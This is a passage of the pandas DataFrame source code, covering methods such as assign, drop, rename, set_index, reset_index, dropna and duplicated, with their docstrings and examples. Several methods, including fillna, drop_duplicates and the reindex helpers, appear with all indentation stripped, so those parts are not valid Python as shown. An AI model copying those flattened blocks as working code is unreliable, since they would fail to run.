        Where the value is a callable, evaluated on `df`:
        >>> df.assign(ln_A = lambda x: np.log(x.A))
            A         B      ln_A
        0   1  0.426905  0.000000
        1   2 -0.780949  0.693147
        2   3 -0.418711  1.098612
        3   4 -0.269708  1.386294
        4   5 -0.274002  1.609438
        5   6 -0.500792  1.791759
        6   7  1.649697  1.945910
        7   8 -1.495604  2.079442
        8   9  0.549296  2.197225
        9  10 -0.758542  2.302585
        Where the value already exists and is inserted:
        >>> newcol = np.log(df['A'])
        >>> df.assign(ln_A=newcol)
            A         B      ln_A
        0   1  0.426905  0.000000
        1   2 -0.780949  0.693147
        2   3 -0.418711  1.098612
        3   4 -0.269708  1.386294
        4   5 -0.274002  1.609438
        5   6 -0.500792  1.791759
        6   7  1.649697  1.945910
        7   8 -1.495604  2.079442
        8   9  0.549296  2.197225
        9  10 -0.758542  2.302585
        Where the keyword arguments depend on each other
        >>> df = pd.DataFrame({'A': [1, 2, 3]})
        >>> df.assign(B=df.A, C=lambda x:x['A']+ x['B'])
            A  B  C
         0  1  1  2
         1  2  2  4
         2  3  3  6
        """
        # always operate on a copy; the original frame is never mutated
        data = self.copy()

        # >= 3.6 preserve order of kwargs
        if PY36:
            for k, v in kwargs.items():
                data[k] = com._apply_if_callable(v, data)
        else:
            # <= 3.5: do all calculations first...
            results = OrderedDict()
            for k, v in kwargs.items():
                results[k] = com._apply_if_callable(v, data)

            # <= 3.5 and earlier
            results = sorted(results.items())
            # ... and then assign
            for k, v in results:
                data[k] = v
        return data
    def _sanitize_column(self, key, value, broadcast=True):
        """
        Ensures new columns (which go into the BlockManager as new blocks) are
        always copied and converted into an array.

        Parameters
        ----------
        key : object
        value : scalar, Series, or array-like
        broadcast : bool, default True
            If ``key`` matches multiple duplicate column names in the
            DataFrame, this parameter indicates whether ``value`` should be
            tiled so that the returned array contains a (duplicated) column for
            each occurrence of the key. If False, ``value`` will not be tiled.

        Returns
        -------
        sanitized_column : numpy-array
        """

        def reindexer(value):
            # reindex if necessary

            if value.index.equals(self.index) or not len(self.index):
                value = value._values.copy()
            else:

                # GH 4107
                try:
                    value = value.reindex(self.index)._values
                except Exception as e:

                    # duplicate axis
                    if not value.index.is_unique:
                        raise e

                    # other
                    raise TypeError('incompatible index of inserted column '
                                    'with frame index')
            return value

        if isinstance(value, Series):
            value = reindexer(value)

        elif isinstance(value, DataFrame):
            # align right-hand-side columns if self.columns
            # is multi-index and self[key] is a sub-frame
            if isinstance(self.columns, MultiIndex) and key in self.columns:
                loc = self.columns.get_loc(key)
                if isinstance(loc, (slice, Series, np.ndarray, Index)):
                    cols = maybe_droplevels(self.columns[loc], key)
                    if len(cols) and not cols.equals(value.columns):
                        value = value.reindex(cols, axis=1)
            # now align rows
            value = reindexer(value).T

        elif isinstance(value, ExtensionArray):
            value = value.copy()

        elif isinstance(value, Index) or is_sequence(value):
            from pandas.core.series import _sanitize_index

            # turn me into an ndarray
            value = _sanitize_index(value, self.index, copy=False)
            if not isinstance(value, (np.ndarray, Index)):
                if isinstance(value, list) and len(value) > 0:
                    value = maybe_convert_platform(value)
                else:
                    value = com._asarray_tuplesafe(value)
            elif value.ndim == 2:
                value = value.copy().T
            # NOTE(review): this branch is unreachable -- any Index is
            # already caught by the ``isinstance(value, Index)`` test of the
            # enclosing elif above
            elif isinstance(value, Index):
                value = value.copy(deep=True)
            else:
                value = value.copy()

            # possibly infer to datetimelike
            if is_object_dtype(value.dtype):
                value = maybe_infer_to_datetimelike(value)

        else:
            # upcast the scalar
            value = cast_scalar_to_array(len(self.index), value)
            value = maybe_cast_to_datetime(value, value.dtype)

        # return internal types directly
        if is_extension_type(value) or is_extension_array_dtype(value):
            return value

        # broadcast across multiple columns if necessary
        if broadcast and key in self.columns and value.ndim == 1:
            if (not self.columns.is_unique or
                    isinstance(self.columns, MultiIndex)):
                existing_piece = self[key]
                if isinstance(existing_piece, DataFrame):
                    value = np.tile(value, (len(existing_piece.columns), 1))

        return np.atleast_2d(np.asarray(value))
@property
def _series(self):
result = {}
for idx, item in enumerate(self.columns):
result[item] = Series(self._data.iget(idx), index=self.index,
name=item)
return result
    def lookup(self, row_labels, col_labels):
        """Label-based "fancy indexing" function for DataFrame.
        Given equal-length arrays of row and column labels, return an
        array of the values corresponding to each (row, col) pair.

        Parameters
        ----------
        row_labels : sequence
            The row labels to use for lookup
        col_labels : sequence
            The column labels to use for lookup

        Returns
        -------
        values : ndarray
            The found values

        Notes
        -----
        Akin to::

            result = []
            for row, col in zip(row_labels, col_labels):
                result.append(df.get_value(row, col))
        """
        n = len(row_labels)
        if n != len(col_labels):
            raise ValueError('Row labels must have same size as column labels')

        thresh = 1000
        if not self._is_mixed_type or n > thresh:
            # vectorized path: flat-index into the 2-D values array
            values = self.values
            ridx = self.index.get_indexer(row_labels)
            cidx = self.columns.get_indexer(col_labels)
            if (ridx == -1).any():
                raise KeyError('One or more row labels was not found')
            if (cidx == -1).any():
                raise KeyError('One or more column labels was not found')
            flat_index = ridx * len(self.columns) + cidx
            result = values.flat[flat_index]
        else:
            # mixed dtypes with few lookups: fetch one scalar at a time to
            # avoid materializing a full object-dtype .values array
            result = np.empty(n, dtype='O')
            for i, (r, c) in enumerate(zip(row_labels, col_labels)):
                result[i] = self._get_value(r, c)

        if is_object_dtype(result):
            result = lib.maybe_convert_objects(result)

        return result
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
frame = self
columns = axes['columns']
if columns is not None:
frame = frame._reindex_columns(columns, method, copy, level,
fill_value, limit, tolerance)
index = axes['index']
if index is not None:
frame = frame._reindex_index(index, method, copy, level,
fill_value, limit, tolerance)
return frame
def _reindex_index(self, new_index, method, copy, level, fill_value=np.nan,
limit=None, tolerance=None):
new_index, indexer = self.index.reindex(new_index, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({0: [new_index, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_columns(self, new_columns, method, copy, level,
fill_value=np.nan, limit=None, tolerance=None):
new_columns, indexer = self.columns.reindex(new_columns, method=method,
level=level, limit=limit,
tolerance=tolerance)
return self._reindex_with_indexers({1: [new_columns, indexer]},
copy=copy, fill_value=fill_value,
allow_dups=False)
def _reindex_multi(self, axes, copy, fill_value):
""" we are guaranteed non-Nones in the axes! """
new_index, row_indexer = self.index.reindex(axes['index'])
new_columns, col_indexer = self.columns.reindex(axes['columns'])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(self.values, indexer,
fill_value=fill_value)
return self._constructor(new_values, index=new_index,
columns=new_columns)
else:
return self._reindex_with_indexers({0: [new_index, row_indexer],
1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value)
    @Appender(_shared_docs['align'] % _shared_doc_kwargs)
    def align(self, other, join='outer', axis=None, level=None, copy=True,
              fill_value=None, method=None, limit=None, fill_axis=0,
              broadcast_axis=None):
        # pure pass-through to NDFrame.align; docstring supplied by @Appender
        return super(DataFrame, self).align(other, join=join, axis=axis,
                                            level=level, copy=copy,
                                            fill_value=fill_value,
                                            method=method, limit=limit,
                                            fill_axis=fill_axis,
                                            broadcast_axis=broadcast_axis)
    @Appender(_shared_docs['reindex'] % _shared_doc_kwargs)
    @rewrite_axis_style_signature('labels', [('method', None),
                                             ('copy', True),
                                             ('level', None),
                                             ('fill_value', np.nan),
                                             ('limit', None),
                                             ('tolerance', None)])
    def reindex(self, *args, **kwargs):
        # translate axis-style args ("labels, axis=...") into per-axis kwargs
        axes = validate_axis_style_args(self, args, kwargs, 'labels',
                                        'reindex')
        kwargs.update(axes)
        # Pop these, since the values are in `kwargs` under different names
        kwargs.pop('axis', None)
        kwargs.pop('labels', None)
        return super(DataFrame, self).reindex(**kwargs)
    @Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
    def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
                     limit=None, fill_value=np.nan):
        # pure pass-through to NDFrame.reindex_axis; docstring from @Appender
        return super(DataFrame,
                     self).reindex_axis(labels=labels, axis=axis,
                                        method=method, level=level, copy=copy,
                                        limit=limit, fill_value=fill_value)
    def drop(self, labels=None, axis=0, index=None, columns=None,
             level=None, inplace=False, errors='raise'):
        """
        Drop specified labels from rows or columns.
        Remove rows or columns by specifying label names and corresponding
        axis, or by specifying directly index or column names. When using a
        multi-index, labels on different levels can be removed by specifying
        the level.
        Parameters
        ----------
        labels : single label or list-like
            Index or column labels to drop.
        axis : {0 or 'index', 1 or 'columns'}, default 0
            Whether to drop labels from the index (0 or 'index') or
            columns (1 or 'columns').
        index, columns : single label or list-like
            Alternative to specifying axis (``labels, axis=1``
            is equivalent to ``columns=labels``).
            .. versionadded:: 0.21.0
        level : int or level name, optional
            For MultiIndex, level from which the labels will be removed.
        inplace : bool, default False
            If True, do operation inplace and return None.
        errors : {'ignore', 'raise'}, default 'raise'
            If 'ignore', suppress error and only existing labels are
            dropped.
        Returns
        -------
        dropped : pandas.DataFrame
        See Also
        --------
        DataFrame.loc : Label-location based indexer for selection by label.
        DataFrame.dropna : Return DataFrame with labels on given axis omitted
            where (all or any) data are missing
        DataFrame.drop_duplicates : Return DataFrame with duplicate rows
            removed, optionally only considering certain columns
        Series.drop : Return Series with specified index labels removed.
        Raises
        ------
        KeyError
            If none of the labels are found in the selected axis
        Examples
        --------
        >>> df = pd.DataFrame(np.arange(12).reshape(3,4),
        ...                   columns=['A', 'B', 'C', 'D'])
        >>> df
           A  B   C   D
        0  0  1   2   3
        1  4  5   6   7
        2  8  9  10  11
        Drop columns
        >>> df.drop(['B', 'C'], axis=1)
           A   D
        0  0   3
        1  4   7
        2  8  11
        >>> df.drop(columns=['B', 'C'])
           A   D
        0  0   3
        1  4   7
        2  8  11
        Drop a row by index
        >>> df.drop([0, 1])
           A  B   C   D
        2  8  9  10  11
        Drop columns and/or rows of MultiIndex DataFrame
        >>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
        ...                              ['speed', 'weight', 'length']],
        ...                      labels=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
        ...                              [0, 1, 2, 0, 1, 2, 0, 1, 2]])
        >>> df = pd.DataFrame(index=midx, columns=['big', 'small'],
        ...                   data=[[45, 30], [200, 100], [1.5, 1], [30, 20],
        ...                         [250, 150], [1.5, 0.8], [320, 250],
        ...                         [1, 0.8], [0.3,0.2]])
        >>> df
                        big     small
        lama    speed   45.0    30.0
                weight  200.0   100.0
                length  1.5     1.0
        cow     speed   30.0    20.0
                weight  250.0   150.0
                length  1.5     0.8
        falcon  speed   320.0   250.0
                weight  1.0     0.8
                length  0.3     0.2
        >>> df.drop(index='cow', columns='small')
                        big
        lama    speed   45.0
                weight  200.0
                length  1.5
        falcon  speed   320.0
                weight  1.0
                length  0.3
        >>> df.drop(index='length', level=1)
                        big     small
        lama    speed   45.0    30.0
                weight  200.0   100.0
        cow     speed   30.0    20.0
                weight  250.0   150.0
        falcon  speed   320.0   250.0
                weight  1.0     0.8
        """
        # all validation and axis dispatch is handled by NDFrame.drop
        return super(DataFrame, self).drop(labels=labels, axis=axis,
                                           index=index, columns=columns,
                                           level=level, inplace=inplace,
                                           errors=errors)
    @rewrite_axis_style_signature('mapper', [('copy', True),
                                             ('inplace', False),
                                             ('level', None)])
    def rename(self, *args, **kwargs):
        """Alter axes labels.
        Function / dict values must be unique (1-to-1). Labels not contained in
        a dict / Series will be left as-is. Extra labels listed don't throw an
        error.
        See the :ref:`user guide <basics.rename>` for more.
        Parameters
        ----------
        mapper, index, columns : dict-like or function, optional
            dict-like or functions transformations to apply to
            that axis' values. Use either ``mapper`` and ``axis`` to
            specify the axis to target with ``mapper``, or ``index`` and
            ``columns``.
        axis : int or str, optional
            Axis to target with ``mapper``. Can be either the axis name
            ('index', 'columns') or number (0, 1). The default is 'index'.
        copy : boolean, default True
            Also copy underlying data
        inplace : boolean, default False
            Whether to return a new %(klass)s. If True then value of copy is
            ignored.
        level : int or level name, default None
            In case of a MultiIndex, only rename labels in the specified
            level.
        Returns
        -------
        renamed : DataFrame
        See Also
        --------
        pandas.DataFrame.rename_axis
        Examples
        --------
        ``DataFrame.rename`` supports two calling conventions
        * ``(index=index_mapper, columns=columns_mapper, ...)``
        * ``(mapper, axis={'index', 'columns'}, ...)``
        We *highly* recommend using keyword arguments to clarify your
        intent.
        >>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
        >>> df.rename(index=str, columns={"A": "a", "B": "c"})
           a  c
        0  1  4
        1  2  5
        2  3  6
        >>> df.rename(index=str, columns={"A": "a", "C": "c"})
           a  B
        0  1  4
        1  2  5
        2  3  6
        Using axis-style parameters
        >>> df.rename(str.lower, axis='columns')
           a  b
        0  1  4
        1  2  5
        2  3  6
        >>> df.rename({1: 2, 2: 4}, axis='index')
           A  B
        0  1  4
        2  2  5
        4  3  6
        """
        # Normalize the two calling conventions -- (mapper, axis=...) vs
        # (index=..., columns=...) -- into explicit per-axis kwargs.
        axes = validate_axis_style_args(self, args, kwargs, 'mapper', 'rename')
        kwargs.update(axes)
        # Pop these, since the values are in `kwargs` under different names
        kwargs.pop('axis', None)
        kwargs.pop('mapper', None)
        # The generic NDFrame.rename does the actual relabeling.
        return super(DataFrame, self).rename(**kwargs)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(DataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
@Appender(_shared_docs['replace'] % _shared_doc_kwargs)
def replace(self, to_replace=None, value=None, inplace=False, limit=None,
regex=False, method='pad', axis=None):
return super(DataFrame, self).replace(to_replace=to_replace,
value=value, inplace=inplace,
limit=limit, regex=regex,
method=method, axis=axis)
@Appender(_shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0):
return super(DataFrame, self).shift(periods=periods, freq=freq,
axis=axis)
    def set_index(self, keys, drop=True, append=False, inplace=False,
                  verify_integrity=False):
        """
        Set the DataFrame index (row labels) using one or more existing
        columns. By default yields a new object.
        Parameters
        ----------
        keys : column label or list of column labels / arrays
        drop : boolean, default True
            Delete columns to be used as the new index
        append : boolean, default False
            Whether to append columns to existing index
        inplace : boolean, default False
            Modify the DataFrame in place (do not create a new object)
        verify_integrity : boolean, default False
            Check the new index for duplicates. Otherwise defer the check until
            necessary. Setting to False will improve the performance of this
            method
        Examples
        --------
        >>> df = pd.DataFrame({'month': [1, 4, 7, 10],
        ...                    'year': [2012, 2014, 2013, 2014],
        ...                    'sale':[55, 40, 84, 31]})
           month  sale  year
        0  1      55    2012
        1  4      40    2014
        2  7      84    2013
        3  10     31    2014
        Set the index to become the 'month' column:
        >>> df.set_index('month')
               sale  year
        month
        1      55    2012
        4      40    2014
        7      84    2013
        10     31    2014
        Create a multi-index using columns 'year' and 'month':
        >>> df.set_index(['year', 'month'])
                    sale
        year  month
        2012  1     55
        2014  4     40
        2013  7     84
        2014  10    31
        Create a multi-index using a set of values and a column:
        >>> df.set_index([[1, 2, 3, 4], 'year'])
                 month  sale
           year
        1  2012  1      55
        2  2014  4      40
        3  2013  7      84
        4  2014  10     31
        Returns
        -------
        dataframe : DataFrame
        """
        inplace = validate_bool_kwarg(inplace, 'inplace')
        if not isinstance(keys, list):
            keys = [keys]
        if inplace:
            frame = self
        else:
            frame = self.copy()
        # `arrays`/`names` accumulate one entry per level of the new index.
        arrays = []
        names = []
        if append:
            # keep the existing index level(s) in front of the new keys
            names = [x for x in self.index.names]
            if isinstance(self.index, MultiIndex):
                for i in range(self.index.nlevels):
                    arrays.append(self.index._get_level_values(i))
            else:
                arrays.append(self.index)
        to_remove = []
        for col in keys:
            if isinstance(col, MultiIndex):
                # append all but the last column so we don't have to modify
                # the end of this loop
                for n in range(col.nlevels - 1):
                    arrays.append(col._get_level_values(n))
                level = col._get_level_values(col.nlevels - 1)
                names.extend(col.names)
            elif isinstance(col, Series):
                level = col._values
                names.append(col.name)
            elif isinstance(col, Index):
                level = col
                names.append(col.name)
            elif isinstance(col, (list, np.ndarray, Index)):
                # raw array-likes contribute an unnamed level
                level = col
                names.append(None)
            else:
                # otherwise `col` must label an existing column of the frame
                level = frame[col]._values
                names.append(col)
                if drop:
                    to_remove.append(col)
            arrays.append(level)
        index = _ensure_index_from_sequences(arrays, names)
        if verify_integrity and not index.is_unique:
            duplicates = index.get_duplicates()
            raise ValueError('Index has duplicate keys: %s' % duplicates)
        # remove consumed columns only after the index was built successfully
        for c in to_remove:
            del frame[c]
        # clear up memory usage
        index._cleanup()
        frame.index = index
        if not inplace:
            return frame
    def reset_index(self, level=None, drop=False, inplace=False, col_level=0,
                    col_fill=''):
        """
        For DataFrame with multi-level index, return new DataFrame with
        labeling information in the columns under the index names, defaulting
        to 'level_0', 'level_1', etc. if any are None. For a standard index,
        the index name will be used (if set), otherwise a default 'index' or
        'level_0' (if 'index' is already taken) will be used.
        Parameters
        ----------
        level : int, str, tuple, or list, default None
            Only remove the given levels from the index. Removes all levels by
            default
        drop : boolean, default False
            Do not try to insert index into dataframe columns. This resets
            the index to the default integer index.
        inplace : boolean, default False
            Modify the DataFrame in place (do not create a new object)
        col_level : int or str, default 0
            If the columns have multiple levels, determines which level the
            labels are inserted into. By default it is inserted into the first
            level.
        col_fill : object, default ''
            If the columns have multiple levels, determines how the other
            levels are named. If None then the index name is repeated.
        Returns
        -------
        resetted : DataFrame
        Examples
        --------
        >>> df = pd.DataFrame([('bird',    389.0),
        ...                    ('bird',     24.0),
        ...                    ('mammal',   80.5),
        ...                    ('mammal', np.nan)],
        ...                   index=['falcon', 'parrot', 'lion', 'monkey'],
        ...                   columns=('class', 'max_speed'))
        >>> df
                 class  max_speed
        falcon    bird      389.0
        parrot    bird       24.0
        lion    mammal       80.5
        monkey  mammal        NaN
        When we reset the index, the old index is added as a column, and a
        new sequential index is used:
        >>> df.reset_index()
            index   class  max_speed
        0  falcon    bird      389.0
        1  parrot    bird       24.0
        2    lion  mammal       80.5
        3  monkey  mammal        NaN
        We can use the `drop` parameter to avoid the old index being added as
        a column:
        >>> df.reset_index(drop=True)
            class  max_speed
        0    bird      389.0
        1    bird       24.0
        2  mammal       80.5
        3  mammal        NaN
        You can also use `reset_index` with `MultiIndex`.
        >>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
        ...                                    ('bird', 'parrot'),
        ...                                    ('mammal', 'lion'),
        ...                                    ('mammal', 'monkey')],
        ...                                   names=['class', 'name'])
        >>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
        ...                                      ('species', 'type')])
        >>> df = pd.DataFrame([(389.0, 'fly'),
        ...                    ( 24.0, 'fly'),
        ...                    ( 80.5, 'run'),
        ...                    (np.nan, 'jump')],
        ...                   index=index,
        ...                   columns=columns)
        >>> df
                       speed species
                         max    type
        class  name
        bird   falcon  389.0     fly
               parrot   24.0     fly
        mammal lion     80.5     run
               monkey    NaN    jump
        If the index has multiple levels, we can reset a subset of them:
        >>> df.reset_index(level='class')
                 class  speed species
                          max    type
        name
        falcon    bird  389.0     fly
        parrot    bird   24.0     fly
        lion    mammal   80.5     run
        monkey  mammal    NaN    jump
        If we are not dropping the index, by default, it is placed in the top
        level. We can place it in another level:
        >>> df.reset_index(level='class', col_level=1)
                        speed species
                 class    max    type
        name
        falcon    bird  389.0     fly
        parrot    bird   24.0     fly
        lion    mammal   80.5     run
        monkey  mammal    NaN    jump
        When the index is inserted under another level, we can specify under
        which one with the parameter `col_fill`:
        >>> df.reset_index(level='class', col_level=1, col_fill='species')
                      species  speed species
                        class    max    type
        name
        falcon           bird  389.0     fly
        parrot           bird   24.0     fly
        lion           mammal   80.5     run
        monkey         mammal    NaN    jump
        If we specify a nonexistent level for `col_fill`, it is created:
        >>> df.reset_index(level='class', col_level=1, col_fill='genus')
                        genus  speed species
                        class    max    type
        name
        falcon           bird  389.0     fly
        parrot           bird   24.0     fly
        lion           mammal   80.5     run
        monkey         mammal    NaN    jump
        """
        inplace = validate_bool_kwarg(inplace, 'inplace')
        if inplace:
            new_obj = self
        else:
            new_obj = self.copy()
        def _maybe_casted_values(index, labels=None):
            # Convert one index level to an ndarray of values, re-inferring
            # the dtype for object data and masking missing (-1) codes as NaN.
            values = index._values
            if not isinstance(index, (PeriodIndex, DatetimeIndex)):
                if values.dtype == np.object_:
                    values = lib.maybe_convert_objects(values)
            # if we have the labels, extract the values with a mask
            if labels is not None:
                mask = labels == -1
                # we can have situations where the whole mask is -1,
                # meaning there is nothing found in labels, so make all nan's
                if mask.all():
                    values = np.empty(len(mask))
                    values.fill(np.nan)
                else:
                    values = values.take(labels)
                    if mask.any():
                        values, changed = maybe_upcast_putmask(
                            values, mask, np.nan)
            return values
        new_index = com._default_index(len(new_obj))
        if level is not None:
            # only a subset of the levels is being reset
            if not isinstance(level, (tuple, list)):
                level = [level]
            level = [self.index._get_level_number(lev) for lev in level]
            if isinstance(self.index, MultiIndex):
                if len(level) < self.index.nlevels:
                    new_index = self.index.droplevel(level)
        if not drop:
            if isinstance(self.index, MultiIndex):
                names = [n if n is not None else ('level_%d' % i)
                         for (i, n) in enumerate(self.index.names)]
                to_insert = lzip(self.index.levels, self.index.labels)
            else:
                default = 'index' if 'index' not in self else 'level_0'
                names = ([default] if self.index.name is None
                         else [self.index.name])
                to_insert = ((self.index, None),)
            multi_col = isinstance(self.columns, MultiIndex)
            # insert levels right-to-left so each ends up at column position 0
            for i, (lev, lab) in reversed(list(enumerate(to_insert))):
                if not (level is None or i in level):
                    continue
                name = names[i]
                if multi_col:
                    # build a full-length tuple column name, padding the
                    # remaining column levels with `col_fill`
                    col_name = (list(name) if isinstance(name, tuple)
                                else [name])
                    if col_fill is None:
                        if len(col_name) not in (1, self.columns.nlevels):
                            raise ValueError("col_fill=None is incompatible "
                                             "with incomplete column name "
                                             "{}".format(name))
                        col_fill = col_name[0]
                    lev_num = self.columns._get_level_number(col_level)
                    name_lst = [col_fill] * lev_num + col_name
                    missing = self.columns.nlevels - len(name_lst)
                    name_lst += [col_fill] * missing
                    name = tuple(name_lst)
                # to ndarray and maybe infer different dtype
                level_values = _maybe_casted_values(lev, lab)
                new_obj.insert(0, name, level_values)
        new_obj.index = new_index
        if not inplace:
            return new_obj
# ----------------------------------------------------------------------
# Reindex-based selection methods
    @Appender(_shared_docs['isna'] % _shared_doc_kwargs)
    def isna(self):
        # Pure delegation; the logic lives on NDFrame.
        return super(DataFrame, self).isna()
    @Appender(_shared_docs['isna'] % _shared_doc_kwargs)
    def isnull(self):
        # Alias of isna; delegates to NDFrame.
        return super(DataFrame, self).isnull()
    @Appender(_shared_docs['notna'] % _shared_doc_kwargs)
    def notna(self):
        # Pure delegation; the logic lives on NDFrame.
        return super(DataFrame, self).notna()
    @Appender(_shared_docs['notna'] % _shared_doc_kwargs)
    def notnull(self):
        # Alias of notna; delegates to NDFrame.
        return super(DataFrame, self).notnull()
    def dropna(self, axis=0, how='any', thresh=None, subset=None,
               inplace=False):
        """
        Remove missing values.
        See the :ref:`User Guide <missing_data>` for more on which values are
        considered missing, and how to work with missing data.
        Parameters
        ----------
        axis : {0 or 'index', 1 or 'columns'}, or tuple/list thereof
            Determine if rows or columns which contain missing values are
            removed.
            * 0, or 'index' : Drop rows which contain missing values.
            * 1, or 'columns' : Drop columns which contain missing value.
            Pass tuple or list to drop on multiple axes.
        how : {'any', 'all'}, default 'any'
            Determine if row or column is removed from DataFrame, when we have
            at least one NA or all NA.
            * 'any' : If any NA values are present, drop that row or column.
            * 'all' : If all values are NA, drop that row or column.
        thresh : int, optional
            Require that many non-NA values.
        subset : array-like, optional
            Labels along other axis to consider, e.g. if you are dropping rows
            these would be a list of columns to include.
        inplace : bool, default False
            If True, do operation inplace and return None.
        Returns
        -------
        DataFrame
            DataFrame with NA entries dropped from it.
        See Also
        --------
        DataFrame.isna: Indicate missing values.
        DataFrame.notna : Indicate existing (non-missing) values.
        DataFrame.fillna : Replace missing values.
        Series.dropna : Drop missing values.
        Index.dropna : Drop missing indices.
        Examples
        --------
        >>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
        ...                    "toy": [np.nan, 'Batmobile', 'Bullwhip'],
        ...                    "born": [pd.NaT, pd.Timestamp("1940-04-25"),
        ...                             pd.NaT]})
        >>> df
               name        toy       born
        0    Alfred        NaN        NaT
        1    Batman  Batmobile 1940-04-25
        2  Catwoman   Bullwhip        NaT
        Drop the rows where at least one element is missing.
        >>> df.dropna()
             name        toy       born
        1  Batman  Batmobile 1940-04-25
        Drop the columns where at least one element is missing.
        >>> df.dropna(axis='columns')
               name
        0    Alfred
        1    Batman
        2  Catwoman
        Drop the rows where all elements are missing.
        >>> df.dropna(how='all')
               name        toy       born
        0    Alfred        NaN        NaT
        1    Batman  Batmobile 1940-04-25
        2  Catwoman   Bullwhip        NaT
        Keep only the rows with at least 2 non-NA values.
        >>> df.dropna(thresh=2)
               name        toy       born
        1    Batman  Batmobile 1940-04-25
        2  Catwoman   Bullwhip        NaT
        Define in which columns to look for missing values.
        >>> df.dropna(subset=['name', 'born'])
               name        toy       born
        1    Batman  Batmobile 1940-04-25
        Keep the DataFrame with valid entries in the same variable.
        >>> df.dropna(inplace=True)
        >>> df
             name        toy       born
        1  Batman  Batmobile 1940-04-25
        """
        inplace = validate_bool_kwarg(inplace, 'inplace')
        if isinstance(axis, (tuple, list)):
            # drop along each requested axis in turn
            result = self
            for ax in axis:
                result = result.dropna(how=how, thresh=thresh, subset=subset,
                                       axis=ax)
        else:
            axis = self._get_axis_number(axis)
            # the non-NA count is taken along the *other* axis
            agg_axis = 1 - axis
            agg_obj = self
            if subset is not None:
                # restrict counting to the requested labels on the other axis;
                # unknown labels raise KeyError (same as __getitem__)
                ax = self._get_axis(agg_axis)
                indices = ax.get_indexer_for(subset)
                check = indices == -1
                if check.any():
                    raise KeyError(list(np.compress(check, subset)))
                agg_obj = self.take(indices, axis=agg_axis)
            count = agg_obj.count(axis=agg_axis)
            # rows/columns to KEEP
            if thresh is not None:
                mask = count >= thresh
            elif how == 'any':
                mask = count == len(agg_obj._get_axis(agg_axis))
            elif how == 'all':
                mask = count > 0
            else:
                if how is not None:
                    raise ValueError('invalid how option: %s' % how)
                else:
                    raise TypeError('must specify how or thresh')
            result = self._take(mask.nonzero()[0], axis=axis, convert=False)
        if inplace:
            self._update_inplace(result)
        else:
            return result
def drop_duplicates(self, subset=None, keep='first', inplace=False):
"""
Return DataFrame with duplicate rows removed, optionally only
considering certain columns
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns
keep : {'first', 'last', False}, default 'first'
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : boolean, default False
Whether to drop duplicates in place or to return a copy
Returns
-------
deduplicated : DataFrame
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
duplicated = self.duplicated(subset, keep=keep)
if inplace:
inds, = (-duplicated).nonzero()
new_data = self._data.take(inds)
self._update_inplace(new_data)
else:
return self[-duplicated]
    def duplicated(self, subset=None, keep='first'):
        """
        Return boolean Series denoting duplicate rows, optionally only
        considering certain columns
        Parameters
        ----------
        subset : column label or sequence of labels, optional
            Only consider certain columns for identifying duplicates, by
            default use all of the columns
        keep : {'first', 'last', False}, default 'first'
            - ``first`` : Mark duplicates as ``True`` except for the
              first occurrence.
            - ``last`` : Mark duplicates as ``True`` except for the
              last occurrence.
            - False : Mark all duplicates as ``True``.
        Returns
        -------
        duplicated : Series
        """
        from pandas.core.sorting import get_group_index
        from pandas._libs.hashtable import duplicated_int64, _SIZE_HINT_LIMIT
        def f(vals):
            # factorize one column into integer codes plus its unique count
            labels, shape = algorithms.factorize(
                vals, size_hint=min(len(self), _SIZE_HINT_LIMIT))
            return labels.astype('i8', copy=False), len(shape)
        if subset is None:
            subset = self.columns
        elif (not np.iterable(subset) or
              isinstance(subset, compat.string_types) or
              isinstance(subset, tuple) and subset in self.columns):
            # a single column label (possibly itself a tuple) -> 1-tuple
            subset = subset,
        # Verify all columns in subset exist in the queried dataframe
        # Otherwise, raise a KeyError, same as if you try to __getitem__ with a
        # key that doesn't exist.
        diff = Index(subset).difference(self.columns)
        if not diff.empty:
            raise KeyError(diff)
        vals = (col.values for name, col in self.iteritems()
                if name in subset)
        labels, shape = map(list, zip(*map(f, vals)))
        # collapse the per-column codes into a single group id per row, then
        # flag duplicate ids according to `keep`
        ids = get_group_index(labels, shape, sort=False, xnull=False)
        return Series(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
    @Appender(_shared_docs['sort_values'] % _shared_doc_kwargs)
    def sort_values(self, by, axis=0, ascending=True, inplace=False,
                    kind='quicksort', na_position='last'):
        inplace = validate_bool_kwarg(inplace, 'inplace')
        axis = self._get_axis_number(axis)
        stacklevel = 2  # Number of stack levels from df.sort_values
        if not isinstance(by, list):
            by = [by]
        if is_sequence(ascending) and len(by) != len(ascending):
            raise ValueError('Length of ascending (%d) != length of by (%d)' %
                             (len(ascending), len(by)))
        if len(by) > 1:
            from pandas.core.sorting import lexsort_indexer
            # multi-key sort: gather each key's values, then lexsort them
            keys = []
            for x in by:
                k = self._get_label_or_level_values(x, axis=axis,
                                                    stacklevel=stacklevel)
                keys.append(k)
            indexer = lexsort_indexer(keys, orders=ascending,
                                      na_position=na_position)
            indexer = _ensure_platform_int(indexer)
        else:
            from pandas.core.sorting import nargsort
            # single key: argsort its values directly
            by = by[0]
            k = self._get_label_or_level_values(by, axis=axis,
